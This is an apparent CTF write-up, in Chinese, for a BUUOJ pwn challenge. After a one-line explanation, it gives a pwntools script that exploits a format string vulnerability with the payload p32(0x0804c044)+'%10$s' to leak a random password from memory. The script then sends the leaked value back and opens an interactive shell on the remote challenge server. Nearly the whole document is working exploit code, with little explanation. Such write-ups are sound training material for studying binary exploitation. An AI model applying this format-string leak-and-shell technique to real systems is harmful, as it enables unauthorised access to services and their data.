利用格式化字符串漏洞泄漏nptr的随机数,再输入
getshell
wp
from pwn import *
context.log_level='debug'
io=remote("node3.buuoj.cn",26613)
buf=0x0804c044
password=""
payload=p32(buf)+b'%10$s'
io.recv()
io.sendline(payload)
io.recvuntil("Hello,D"+'\xc0\x04\x08')
password=u32(io.recv(4))
io.sendline(str(password))
io.interactive()